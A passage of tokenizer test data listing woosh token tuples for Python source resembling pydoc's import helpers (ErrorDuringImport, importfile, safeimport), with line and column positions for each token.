woosh.Token(woosh.OP, '=', 371, 64, 371, 65),
woosh.Token(woosh.NAME, 'loader', 371, 65, 371, 71),
woosh.Token(woosh.OP, ')', 371, 71, 371, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 371, 72, 372, 0),
woosh.Token(woosh.NAME, 'try', 372, 12, 372, 15),
woosh.Token(woosh.OP, ':', 372, 15, 372, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 372, 16, 373, 0),
woosh.Token(woosh.INDENT, ' ', 373, 0, 373, 16),
woosh.Token(woosh.NAME, 'module', 373, 16, 373, 22),
woosh.Token(woosh.OP, '=', 373, 23, 373, 24),
woosh.Token(woosh.NAME, 'importlib', 373, 25, 373, 34),
woosh.Token(woosh.OP, '.', 373, 34, 373, 35),
woosh.Token(woosh.NAME, '_bootstrap', 373, 35, 373, 45),
woosh.Token(woosh.OP, '.', 373, 45, 373, 46),
woosh.Token(woosh.NAME, '_load', 373, 46, 373, 51),
woosh.Token(woosh.OP, '(', 373, 51, 373, 52),
woosh.Token(woosh.NAME, 'spec', 373, 52, 373, 56),
woosh.Token(woosh.OP, ')', 373, 56, 373, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 373, 57, 374, 0),
woosh.Token(woosh.DEDENT, ' ', 374, 0, 374, 12),
woosh.Token(woosh.NAME, 'except', 374, 12, 374, 18),
woosh.Token(woosh.OP, ':', 374, 18, 374, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 374, 19, 375, 0),
woosh.Token(woosh.INDENT, ' ', 375, 0, 375, 16),
woosh.Token(woosh.NAME, 'return', 375, 16, 375, 22),
woosh.Token(woosh.NAME, 'None', 375, 23, 375, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 375, 27, 376, 0),
woosh.Token(woosh.DEDENT, ' ', 376, 0, 376, 12),
woosh.Token(woosh.NAME, 'del', 376, 12, 376, 15),
woosh.Token(woosh.NAME, 'sys', 376, 16, 376, 19),
woosh.Token(woosh.OP, '.', 376, 19, 376, 20),
woosh.Token(woosh.NAME, 'modules', 376, 20, 376, 27),
woosh.Token(woosh.OP, '[', 376, 27, 376, 28),
woosh.Token(woosh.STRING, "'__temp__'", 376, 28, 376, 38),
woosh.Token(woosh.OP, ']', 376, 38, 376, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 376, 39, 377, 0),
woosh.Token(woosh.NAME, 'result', 377, 12, 377, 18),
woosh.Token(woosh.OP, '=', 377, 19, 377, 20),
woosh.Token(woosh.NAME, 'module', 377, 21, 377, 27),
woosh.Token(woosh.OP, '.', 377, 27, 377, 28),
woosh.Token(woosh.NAME, '__doc__', 377, 28, 377, 35),
woosh.Token(woosh.OP, '.', 377, 35, 377, 36),
woosh.Token(woosh.NAME, 'splitlines', 377, 36, 377, 46),
woosh.Token(woosh.OP, '(', 377, 46, 377, 47),
woosh.Token(woosh.OP, ')', 377, 47, 377, 48),
woosh.Token(woosh.OP, '[', 377, 48, 377, 49),
woosh.Token(woosh.NUMBER, '0', 377, 49, 377, 50),
woosh.Token(woosh.OP, ']', 377, 50, 377, 51),
woosh.Token(woosh.NAME, 'if', 377, 52, 377, 54),
woosh.Token(woosh.NAME, 'module', 377, 55, 377, 61),
woosh.Token(woosh.OP, '.', 377, 61, 377, 62),
woosh.Token(woosh.NAME, '__doc__', 377, 62, 377, 69),
woosh.Token(woosh.NAME, 'else', 377, 70, 377, 74),
woosh.Token(woosh.NAME, 'None', 377, 75, 377, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 377, 79, 378, 0),
woosh.Token(woosh.COMMENT, '# Cache the result.', 378, 8, 378, 27),
woosh.Token(woosh.DEDENT, ' ', 379, 0, 379, 8),
woosh.Token(woosh.NAME, 'cache', 379, 8, 379, 13),
woosh.Token(woosh.OP, '[', 379, 13, 379, 14),
woosh.Token(woosh.NAME, 'filename', 379, 14, 379, 22),
woosh.Token(woosh.OP, ']', 379, 22, 379, 23),
woosh.Token(woosh.OP, '=', 379, 24, 379, 25),
woosh.Token(woosh.OP, '(', 379, 26, 379, 27),
woosh.Token(woosh.NAME, 'mtime', 379, 27, 379, 32),
woosh.Token(woosh.OP, ',', 379, 32, 379, 33),
woosh.Token(woosh.NAME, 'result', 379, 34, 379, 40),
woosh.Token(woosh.OP, ')', 379, 40, 379, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 379, 41, 380, 0),
woosh.Token(woosh.DEDENT, ' ', 380, 0, 380, 4),
woosh.Token(woosh.NAME, 'return', 380, 4, 380, 10),
woosh.Token(woosh.NAME, 'result', 380, 11, 380, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 380, 17, 381, 0),
woosh.Token(woosh.DEDENT, '', 382, 0, 382, 0),
woosh.Token(woosh.NAME, 'class', 382, 0, 382, 5),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 382, 6, 382, 23),
woosh.Token(woosh.OP, '(', 382, 23, 382, 24),
woosh.Token(woosh.NAME, 'Exception', 382, 24, 382, 33),
woosh.Token(woosh.OP, ')', 382, 33, 382, 34),
woosh.Token(woosh.OP, ':', 382, 34, 382, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 382, 35, 383, 0),
woosh.Token(woosh.INDENT, ' ', 383, 0, 383, 4),
woosh.Token(woosh.STRING, '"""Errors that occurred while trying to import something to document it."""', 383, 4, 383, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 383, 79, 384, 0),
woosh.Token(woosh.NAME, 'def', 384, 4, 384, 7),
woosh.Token(woosh.NAME, '__init__', 384, 8, 384, 16),
woosh.Token(woosh.OP, '(', 384, 16, 384, 17),
woosh.Token(woosh.NAME, 'self', 384, 17, 384, 21),
woosh.Token(woosh.OP, ',', 384, 21, 384, 22),
woosh.Token(woosh.NAME, 'filename', 384, 23, 384, 31),
woosh.Token(woosh.OP, ',', 384, 31, 384, 32),
woosh.Token(woosh.NAME, 'exc_info', 384, 33, 384, 41),
woosh.Token(woosh.OP, ')', 384, 41, 384, 42),
woosh.Token(woosh.OP, ':', 384, 42, 384, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 384, 43, 385, 0),
woosh.Token(woosh.INDENT, ' ', 385, 0, 385, 8),
woosh.Token(woosh.NAME, 'self', 385, 8, 385, 12),
woosh.Token(woosh.OP, '.', 385, 12, 385, 13),
woosh.Token(woosh.NAME, 'filename', 385, 13, 385, 21),
woosh.Token(woosh.OP, '=', 385, 22, 385, 23),
woosh.Token(woosh.NAME, 'filename', 385, 24, 385, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 385, 32, 386, 0),
woosh.Token(woosh.NAME, 'self', 386, 8, 386, 12),
woosh.Token(woosh.OP, '.', 386, 12, 386, 13),
woosh.Token(woosh.NAME, 'exc', 386, 13, 386, 16),
woosh.Token(woosh.OP, ',', 386, 16, 386, 17),
woosh.Token(woosh.NAME, 'self', 386, 18, 386, 22),
woosh.Token(woosh.OP, '.', 386, 22, 386, 23),
woosh.Token(woosh.NAME, 'value', 386, 23, 386, 28),
woosh.Token(woosh.OP, ',', 386, 28, 386, 29),
woosh.Token(woosh.NAME, 'self', 386, 30, 386, 34),
woosh.Token(woosh.OP, '.', 386, 34, 386, 35),
woosh.Token(woosh.NAME, 'tb', 386, 35, 386, 37),
woosh.Token(woosh.OP, '=', 386, 38, 386, 39),
woosh.Token(woosh.NAME, 'exc_info', 386, 40, 386, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 386, 48, 387, 0),
woosh.Token(woosh.DEDENT, ' ', 388, 0, 388, 4),
woosh.Token(woosh.NAME, 'def', 388, 4, 388, 7),
woosh.Token(woosh.NAME, '__str__', 388, 8, 388, 15),
woosh.Token(woosh.OP, '(', 388, 15, 388, 16),
woosh.Token(woosh.NAME, 'self', 388, 16, 388, 20),
woosh.Token(woosh.OP, ')', 388, 20, 388, 21),
woosh.Token(woosh.OP, ':', 388, 21, 388, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 388, 22, 389, 0),
woosh.Token(woosh.INDENT, ' ', 389, 0, 389, 8),
woosh.Token(woosh.NAME, 'exc', 389, 8, 389, 11),
woosh.Token(woosh.OP, '=', 389, 12, 389, 13),
woosh.Token(woosh.NAME, 'self', 389, 14, 389, 18),
woosh.Token(woosh.OP, '.', 389, 18, 389, 19),
woosh.Token(woosh.NAME, 'exc', 389, 19, 389, 22),
woosh.Token(woosh.OP, '.', 389, 22, 389, 23),
woosh.Token(woosh.NAME, '__name__', 389, 23, 389, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 389, 31, 390, 0),
woosh.Token(woosh.NAME, 'return', 390, 8, 390, 14),
woosh.Token(woosh.STRING, "'problem in %s - %s: %s'", 390, 15, 390, 39),
woosh.Token(woosh.OP, '%', 390, 40, 390, 41),
woosh.Token(woosh.OP, '(', 390, 42, 390, 43),
woosh.Token(woosh.NAME, 'self', 390, 43, 390, 47),
woosh.Token(woosh.OP, '.', 390, 47, 390, 48),
woosh.Token(woosh.NAME, 'filename', 390, 48, 390, 56),
woosh.Token(woosh.OP, ',', 390, 56, 390, 57),
woosh.Token(woosh.NAME, 'exc', 390, 58, 390, 61),
woosh.Token(woosh.OP, ',', 390, 61, 390, 62),
woosh.Token(woosh.NAME, 'self', 390, 63, 390, 67),
woosh.Token(woosh.OP, '.', 390, 67, 390, 68),
woosh.Token(woosh.NAME, 'value', 390, 68, 390, 73),
woosh.Token(woosh.OP, ')', 390, 73, 390, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 390, 74, 391, 0),
woosh.Token(woosh.DEDENT, '', 392, 0, 392, 0),
woosh.Token(woosh.DEDENT, '', 392, 0, 392, 0),
woosh.Token(woosh.NAME, 'def', 392, 0, 392, 3),
woosh.Token(woosh.NAME, 'importfile', 392, 4, 392, 14),
woosh.Token(woosh.OP, '(', 392, 14, 392, 15),
woosh.Token(woosh.NAME, 'path', 392, 15, 392, 19),
woosh.Token(woosh.OP, ')', 392, 19, 392, 20),
woosh.Token(woosh.OP, ':', 392, 20, 392, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 392, 21, 393, 0),
woosh.Token(woosh.INDENT, ' ', 393, 0, 393, 4),
woosh.Token(woosh.STRING, '"""Import a Python source file or compiled file given its path."""', 393, 4, 393, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 393, 70, 394, 0),
woosh.Token(woosh.NAME, 'magic', 394, 4, 394, 9),
woosh.Token(woosh.OP, '=', 394, 10, 394, 11),
woosh.Token(woosh.NAME, 'importlib', 394, 12, 394, 21),
woosh.Token(woosh.OP, '.', 394, 21, 394, 22),
woosh.Token(woosh.NAME, 'util', 394, 22, 394, 26),
woosh.Token(woosh.OP, '.', 394, 26, 394, 27),
woosh.Token(woosh.NAME, 'MAGIC_NUMBER', 394, 27, 394, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 394, 39, 395, 0),
woosh.Token(woosh.NAME, 'with', 395, 4, 395, 8),
woosh.Token(woosh.NAME, 'open', 395, 9, 395, 13),
woosh.Token(woosh.OP, '(', 395, 13, 395, 14),
woosh.Token(woosh.NAME, 'path', 395, 14, 395, 18),
woosh.Token(woosh.OP, ',', 395, 18, 395, 19),
woosh.Token(woosh.STRING, "'rb'", 395, 20, 395, 24),
woosh.Token(woosh.OP, ')', 395, 24, 395, 25),
woosh.Token(woosh.NAME, 'as', 395, 26, 395, 28),
woosh.Token(woosh.NAME, 'file', 395, 29, 395, 33),
woosh.Token(woosh.OP, ':', 395, 33, 395, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 395, 34, 396, 0),
woosh.Token(woosh.INDENT, ' ', 396, 0, 396, 8),
woosh.Token(woosh.NAME, 'is_bytecode', 396, 8, 396, 19),
woosh.Token(woosh.OP, '=', 396, 20, 396, 21),
woosh.Token(woosh.NAME, 'magic', 396, 22, 396, 27),
woosh.Token(woosh.OP, '==', 396, 28, 396, 30),
woosh.Token(woosh.NAME, 'file', 396, 31, 396, 35),
woosh.Token(woosh.OP, '.', 396, 35, 396, 36),
woosh.Token(woosh.NAME, 'read', 396, 36, 396, 40),
woosh.Token(woosh.OP, '(', 396, 40, 396, 41),
woosh.Token(woosh.NAME, 'len', 396, 41, 396, 44),
woosh.Token(woosh.OP, '(', 396, 44, 396, 45),
woosh.Token(woosh.NAME, 'magic', 396, 45, 396, 50),
woosh.Token(woosh.OP, ')', 396, 50, 396, 51),
woosh.Token(woosh.OP, ')', 396, 51, 396, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 396, 52, 397, 0),
woosh.Token(woosh.DEDENT, ' ', 397, 0, 397, 4),
woosh.Token(woosh.NAME, 'filename', 397, 4, 397, 12),
woosh.Token(woosh.OP, '=', 397, 13, 397, 14),
woosh.Token(woosh.NAME, 'os', 397, 15, 397, 17),
woosh.Token(woosh.OP, '.', 397, 17, 397, 18),
woosh.Token(woosh.NAME, 'path', 397, 18, 397, 22),
woosh.Token(woosh.OP, '.', 397, 22, 397, 23),
woosh.Token(woosh.NAME, 'basename', 397, 23, 397, 31),
woosh.Token(woosh.OP, '(', 397, 31, 397, 32),
woosh.Token(woosh.NAME, 'path', 397, 32, 397, 36),
woosh.Token(woosh.OP, ')', 397, 36, 397, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 397, 37, 398, 0),
woosh.Token(woosh.NAME, 'name', 398, 4, 398, 8),
woosh.Token(woosh.OP, ',', 398, 8, 398, 9),
woosh.Token(woosh.NAME, 'ext', 398, 10, 398, 13),
woosh.Token(woosh.OP, '=', 398, 14, 398, 15),
woosh.Token(woosh.NAME, 'os', 398, 16, 398, 18),
woosh.Token(woosh.OP, '.', 398, 18, 398, 19),
woosh.Token(woosh.NAME, 'path', 398, 19, 398, 23),
woosh.Token(woosh.OP, '.', 398, 23, 398, 24),
woosh.Token(woosh.NAME, 'splitext', 398, 24, 398, 32),
woosh.Token(woosh.OP, '(', 398, 32, 398, 33),
woosh.Token(woosh.NAME, 'filename', 398, 33, 398, 41),
woosh.Token(woosh.OP, ')', 398, 41, 398, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 398, 42, 399, 0),
woosh.Token(woosh.NAME, 'if', 399, 4, 399, 6),
woosh.Token(woosh.NAME, 'is_bytecode', 399, 7, 399, 18),
woosh.Token(woosh.OP, ':', 399, 18, 399, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 399, 19, 400, 0),
woosh.Token(woosh.INDENT, ' ', 400, 0, 400, 8),
woosh.Token(woosh.NAME, 'loader', 400, 8, 400, 14),
woosh.Token(woosh.OP, '=', 400, 15, 400, 16),
woosh.Token(woosh.NAME, 'importlib', 400, 17, 400, 26),
woosh.Token(woosh.OP, '.', 400, 26, 400, 27),
woosh.Token(woosh.NAME, '_bootstrap_external', 400, 27, 400, 46),
woosh.Token(woosh.OP, '.', 400, 46, 400, 47),
woosh.Token(woosh.NAME, 'SourcelessFileLoader', 400, 47, 400, 67),
woosh.Token(woosh.OP, '(', 400, 67, 400, 68),
woosh.Token(woosh.NAME, 'name', 400, 68, 400, 72),
woosh.Token(woosh.OP, ',', 400, 72, 400, 73),
woosh.Token(woosh.NAME, 'path', 400, 74, 400, 78),
woosh.Token(woosh.OP, ')', 400, 78, 400, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 400, 79, 401, 0),
woosh.Token(woosh.DEDENT, ' ', 401, 0, 401, 4),
woosh.Token(woosh.NAME, 'else', 401, 4, 401, 8),
woosh.Token(woosh.OP, ':', 401, 8, 401, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 401, 9, 402, 0),
woosh.Token(woosh.INDENT, ' ', 402, 0, 402, 8),
woosh.Token(woosh.NAME, 'loader', 402, 8, 402, 14),
woosh.Token(woosh.OP, '=', 402, 15, 402, 16),
woosh.Token(woosh.NAME, 'importlib', 402, 17, 402, 26),
woosh.Token(woosh.OP, '.', 402, 26, 402, 27),
woosh.Token(woosh.NAME, '_bootstrap_external', 402, 27, 402, 46),
woosh.Token(woosh.OP, '.', 402, 46, 402, 47),
woosh.Token(woosh.NAME, 'SourceFileLoader', 402, 47, 402, 63),
woosh.Token(woosh.OP, '(', 402, 63, 402, 64),
woosh.Token(woosh.NAME, 'name', 402, 64, 402, 68),
woosh.Token(woosh.OP, ',', 402, 68, 402, 69),
woosh.Token(woosh.NAME, 'path', 402, 70, 402, 74),
woosh.Token(woosh.OP, ')', 402, 74, 402, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 402, 75, 403, 0),
woosh.Token(woosh.COMMENT, "# XXX We probably don't need to pass in the loader here.", 403, 4, 403, 60),
woosh.Token(woosh.DEDENT, ' ', 404, 0, 404, 4),
woosh.Token(woosh.NAME, 'spec', 404, 4, 404, 8),
woosh.Token(woosh.OP, '=', 404, 9, 404, 10),
woosh.Token(woosh.NAME, 'importlib', 404, 11, 404, 20),
woosh.Token(woosh.OP, '.', 404, 20, 404, 21),
woosh.Token(woosh.NAME, 'util', 404, 21, 404, 25),
woosh.Token(woosh.OP, '.', 404, 25, 404, 26),
woosh.Token(woosh.NAME, 'spec_from_file_location', 404, 26, 404, 49),
woosh.Token(woosh.OP, '(', 404, 49, 404, 50),
woosh.Token(woosh.NAME, 'name', 404, 50, 404, 54),
woosh.Token(woosh.OP, ',', 404, 54, 404, 55),
woosh.Token(woosh.NAME, 'path', 404, 56, 404, 60),
woosh.Token(woosh.OP, ',', 404, 60, 404, 61),
woosh.Token(woosh.NAME, 'loader', 404, 62, 404, 68),
woosh.Token(woosh.OP, '=', 404, 68, 404, 69),
woosh.Token(woosh.NAME, 'loader', 404, 69, 404, 75),
woosh.Token(woosh.OP, ')', 404, 75, 404, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 404, 76, 405, 0),
woosh.Token(woosh.NAME, 'try', 405, 4, 405, 7),
woosh.Token(woosh.OP, ':', 405, 7, 405, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 405, 8, 406, 0),
woosh.Token(woosh.INDENT, ' ', 406, 0, 406, 8),
woosh.Token(woosh.NAME, 'return', 406, 8, 406, 14),
woosh.Token(woosh.NAME, 'importlib', 406, 15, 406, 24),
woosh.Token(woosh.OP, '.', 406, 24, 406, 25),
woosh.Token(woosh.NAME, '_bootstrap', 406, 25, 406, 35),
woosh.Token(woosh.OP, '.', 406, 35, 406, 36),
woosh.Token(woosh.NAME, '_load', 406, 36, 406, 41),
woosh.Token(woosh.OP, '(', 406, 41, 406, 42),
woosh.Token(woosh.NAME, 'spec', 406, 42, 406, 46),
woosh.Token(woosh.OP, ')', 406, 46, 406, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 406, 47, 407, 0),
woosh.Token(woosh.DEDENT, ' ', 407, 0, 407, 4),
woosh.Token(woosh.NAME, 'except', 407, 4, 407, 10),
woosh.Token(woosh.OP, ':', 407, 10, 407, 11),
woosh.Token(woosh.NEWLINE, '\r\n', 407, 11, 408, 0),
woosh.Token(woosh.INDENT, ' ', 408, 0, 408, 8),
woosh.Token(woosh.NAME, 'raise', 408, 8, 408, 13),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 408, 14, 408, 31),
woosh.Token(woosh.OP, '(', 408, 31, 408, 32),
woosh.Token(woosh.NAME, 'path', 408, 32, 408, 36),
woosh.Token(woosh.OP, ',', 408, 36, 408, 37),
woosh.Token(woosh.NAME, 'sys', 408, 38, 408, 41),
woosh.Token(woosh.OP, '.', 408, 41, 408, 42),
woosh.Token(woosh.NAME, 'exc_info', 408, 42, 408, 50),
woosh.Token(woosh.OP, '(', 408, 50, 408, 51),
woosh.Token(woosh.OP, ')', 408, 51, 408, 52),
woosh.Token(woosh.OP, ')', 408, 52, 408, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 408, 53, 409, 0),
woosh.Token(woosh.DEDENT, '', 410, 0, 410, 0),
woosh.Token(woosh.DEDENT, '', 410, 0, 410, 0),
woosh.Token(woosh.NAME, 'def', 410, 0, 410, 3),
woosh.Token(woosh.NAME, 'safeimport', 410, 4, 410, 14),
woosh.Token(woosh.OP, '(', 410, 14, 410, 15),
woosh.Token(woosh.NAME, 'path', 410, 15, 410, 19),
woosh.Token(woosh.OP, ',', 410, 19, 410, 20),
woosh.Token(woosh.NAME, 'forceload', 410, 21, 410, 30),
woosh.Token(woosh.OP, '=', 410, 30, 410, 31),
woosh.Token(woosh.NUMBER, '0', 410, 31, 410, 32),
woosh.Token(woosh.OP, ',', 410, 32, 410, 33),
woosh.Token(woosh.NAME, 'cache', 410, 34, 410, 39),
woosh.Token(woosh.OP, '=', 410, 39, 410, 40),
woosh.Token(woosh.OP, '{', 410, 40, 410, 41),
woosh.Token(woosh.OP, '}', 410, 41, 410, 42),
woosh.Token(woosh.OP, ')', 410, 42, 410, 43),
woosh.Token(woosh.OP, ':', 410, 43, 410, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 410, 44, 411, 0),
woosh.Token(woosh.INDENT, ' ', 411, 0, 411, 4),
woosh.Token(woosh.STRING, '"""Import a module; handle errors; return None if the module isn\'t found.\r\n\r\n If the module *is* found but an exception occurs, it\'s wrapped in an\r\n ErrorDuringImport exception and reraised. Unlike __import__, if a\r\n package path is specified, the module at the end of the path is returned,\r\n not the package at the beginning. If the optional \'forceload\' argument\r\n is 1, we reload the module from disk (unless it\'s a dynamic extension)."""', 411, 4, 417, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 417, 78, 418, 0),
woosh.Token(woosh.NAME, 'try', 418, 4, 418, 7),
woosh.Token(woosh.OP, ':', 418, 7, 418, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 418, 8, 419, 0),
woosh.Token(woosh.COMMENT, '# If forceload is 1 and the module has been previously loaded from', 419, 8, 419, 74),
woosh.Token(woosh.COMMENT, "# disk, we always have to reload the module. Checking the file's", 420, 8, 420, 73),
woosh.Token(woosh.COMMENT, "# mtime isn't good enough (e.g. the module could contain a class", 421, 8, 421, 72),
woosh.Token(woosh.COMMENT, '# that inherits from another module that has changed).', 422, 8, 422, 62),
woosh.Token(woosh.INDENT, ' ', 423, 0, 423, 8),
woosh.Token(woosh.NAME, 'if', 423, 8, 423, 10),
woosh.Token(woosh.NAME, 'forceload', 423, 11, 423, 20),
woosh.Token(woosh.NAME, 'and', 423, 21, 423, 24),
woosh.Token(woosh.NAME, 'path', 423, 25, 423, 29),
woosh.Token(woosh.NAME, 'in', 423, 30, 423, 32),
woosh.Token(woosh.NAME, 'sys', 423, 33, 423, 36),
woosh.Token(woosh.OP, '.', 423, 36, 423, 37),
woosh.Token(woosh.NAME, 'modules', 423, 37, 423, 44),
woosh.Token(woosh.OP, ':', 423, 44, 423, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 423, 45, 424, 0),
woosh.Token(woosh.INDENT, ' ', 424, 0, 424, 12),
woosh.Token(woosh.NAME, 'if', 424, 12, 424, 14),
woosh.Token(woosh.NAME, 'path', 424, 15, 424, 19),
woosh.Token(woosh.NAME, 'not', 424, 20, 424, 23),
woosh.Token(woosh.NAME, 'in', 424, 24, 424, 26),
woosh.Token(woosh.NAME, 'sys', 424, 27, 424, 30),
woosh.Token(woosh.OP, '.', 424, 30, 424, 31),
woosh.Token(woosh.NAME, 'builtin_module_names', 424, 31, 424, 51),
woosh.Token(woosh.OP, ':', 424, 51, 424, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 424, 52, 425, 0),
woosh.Token(woosh.COMMENT, '# Remove the module from sys.modules and re-import to try', 425, 16, 425, 73),
woosh.Token(woosh.COMMENT, '# and avoid problems with partially loaded modules.', 426, 16, 426, 67),
woosh.Token(woosh.COMMENT, "# Also remove any submodules because they won't appear", 427, 16, 427, 70),
woosh.Token(woosh.COMMENT, "# in the newly loaded module's namespace if they're already", 428, 16, 428, 75),
woosh.Token(woosh.COMMENT, '# in sys.modules.', 429, 16, 429, 33),
woosh.Token(woosh.INDENT, ' ', 430, 0, 430, 16),
woosh.Token(woosh.NAME, 'subs', 430, 16, 430, 20),
woosh.Token(woosh.OP, '=', 430, 21, 430, 22),
woosh.Token(woosh.OP, '[', 430, 23, 430, 24),
woosh.Token(woosh.NAME, 'm', 430, 24, 430, 25),
woosh.Token(woosh.NAME, 'for', 430, 26, 430, 29),
woosh.Token(woosh.NAME, 'm', 430, 30, 430, 31),
woosh.Token(woosh.NAME, 'in', 430, 32, 430, 34),
woosh.Token(woosh.NAME, 'sys', 430, 35, 430, 38),
woosh.Token(woosh.OP, '.', 430, 38, 430, 39),
woosh.Token(woosh.NAME, 'modules', 430, 39, 430, 46),
woosh.Token(woosh.NAME, 'if', 430, 47, 430, 49),
woosh.Token(woosh.NAME, 'm', 430, 50, 430, 51),
woosh.Token(woosh.OP, '.', 430, 51, 430, 52),
woosh.Token(woosh.NAME, 'startswith', 430, 52, 430, 62),
woosh.Token(woosh.OP, '(', 430, 62, 430, 63),
woosh.Token(woosh.NAME, 'path', 430, 63, 430, 67),
woosh.Token(woosh.OP, '+', 430, 68, 430, 69),
woosh.Token(woosh.STRING, "'.'", 430, 70, 430, 73),
woosh.Token(woosh.OP, ')', 430, 73, 430, 74),
woosh.Token(woosh.OP, ']', 430, 74, 430, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 430, 75, 431, 0),
woosh.Token(woosh.NAME, 'for', 431, 16, 431, 19),
woosh.Token(woosh.NAME, 'key', 431, 20, 431, 23),
woosh.Token(woosh.NAME, 'in', 431, 24, 431, 26),
woosh.Token(woosh.OP, '[', 431, 27, 431, 28),
woosh.Token(woosh.NAME, 'path', 431, 28, 431, 32),
woosh.Token(woosh.OP, ']', 431, 32, 431, 33),
woosh.Token(woosh.OP, '+', 431, 34, 431, 35),
woosh.Token(woosh.NAME, 'subs', 431, 36, 431, 40),
woosh.Token(woosh.OP, ':', 431, 40, 431, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 431, 41, 432, 0),
woosh.Token(woosh.COMMENT, '# Prevent garbage collection.', 432, 20, 432, 49),
woosh.Token(woosh.INDENT, ' ', 433, 0, 433, 20),
woosh.Token(woosh.NAME, 'cache', 433, 20, 433, 25),
woosh.Token(woosh.OP, '[', 433, 25, 433, 26),
woosh.Token(woosh.NAME, 'key', 433, 26, 433, 29),
woosh.Token(woosh.OP, ']', 433, 29, 433, 30),
woosh.Token(woosh.OP, '=', 433, 31, 433, 32),
woosh.Token(woosh.NAME, 'sys', 433, 33, 433, 36),
woosh.Token(woosh.OP, '.', 433, 36, 433, 37),
woosh.Token(woosh.NAME, 'modules', 433, 37, 433, 44),
woosh.Token(woosh.OP, '[', 433, 44, 433, 45),
woosh.Token(woosh.NAME, 'key', 433, 45, 433, 48),
woosh.Token(woosh.OP, ']', 433, 48, 433, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 433, 49, 434, 0),
woosh.Token(woosh.NAME, 'del', 434, 20, 434, 23),
woosh.Token(woosh.NAME, 'sys', 434, 24, 434, 27),
woosh.Token(woosh.OP, '.', 434, 27, 434, 28),
woosh.Token(woosh.NAME, 'modules', 434, 28, 434, 35),
woosh.Token(woosh.OP, '[', 434, 35, 434, 36),
woosh.Token(woosh.NAME, 'key', 434, 36, 434, 39),
woosh.Token(woosh.OP, ']', 434, 39, 434, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 434, 40, 435, 0),
woosh.Token(woosh.DEDENT, ' ', 435, 0, 435, 8),
woosh.Token(woosh.DEDENT, '', 435, 8, 435, 8),
woosh.Token(woosh.DEDENT, '', 435, 8, 435, 8),
woosh.Token(woosh.NAME, 'module', 435, 8, 435, 14),
woosh.Token(woosh.OP, '=', 435, 15, 435, 16),
woosh.Token(woosh.NAME, '__import__', 435, 17, 435, 27),
woosh.Token(woosh.OP, '(', 435, 27, 435, 28),
woosh.Token(woosh.NAME, 'path', 435, 28, 435, 32),
woosh.Token(woosh.OP, ')', 435, 32, 435, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 435, 33, 436, 0),
woosh.Token(woosh.DEDENT, ' ', 436, 0, 436, 4),
woosh.Token(woosh.NAME, 'except', 436, 4, 436, 10),
woosh.Token(woosh.OP, ':', 436, 10, 436, 11),
woosh.Token(woosh.NEWLINE, '\r\n', 436, 11, 437, 0),
woosh.Token(woosh.COMMENT, '# Did the error occur before or after the module was found?', 437, 8, 437, 67),
woosh.Token(woosh.INDENT, ' ', 438, 0, 438, 8),
woosh.Token(woosh.OP, '(', 438, 8, 438, 9),
woosh.Token(woosh.NAME, 'exc', 438, 9, 438, 12),
woosh.Token(woosh.OP, ',', 438, 12, 438, 13),
woosh.Token(woosh.NAME, 'value', 438, 14, 438, 19),
woosh.Token(woosh.OP, ',', 438, 19, 438, 20),
woosh.Token(woosh.NAME, 'tb', 438, 21, 438, 23),
woosh.Token(woosh.OP, ')', 438, 23, 438, 24),
woosh.Token(woosh.OP, '=', 438, 25, 438, 26),
woosh.Token(woosh.NAME, 'info', 438, 27, 438, 31),
woosh.Token(woosh.OP, '=', 438, 32, 438, 33),
woosh.Token(woosh.NAME, 'sys', 438, 34, 438, 37),
woosh.Token(woosh.OP, '.', 438, 37, 438, 38),
woosh.Token(woosh.NAME, 'exc_info', 438, 38, 438, 46),
woosh.Token(woosh.OP, '(', 438, 46, 438, 47),
woosh.Token(woosh.OP, ')', 438, 47, 438, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 438, 48, 439, 0),
woosh.Token(woosh.NAME, 'if', 439, 8, 439, 10),
woosh.Token(woosh.NAME, 'path', 439, 11, 439, 15),
woosh.Token(woosh.NAME, 'in', 439, 16, 439, 18),
woosh.Token(woosh.NAME, 'sys', 439, 19, 439, 22),
woosh.Token(woosh.OP, '.', 439, 22, 439, 23),
woosh.Token(woosh.NAME, 'modules', 439, 23, 439, 30),
woosh.Token(woosh.OP, ':', 439, 30, 439, 31),
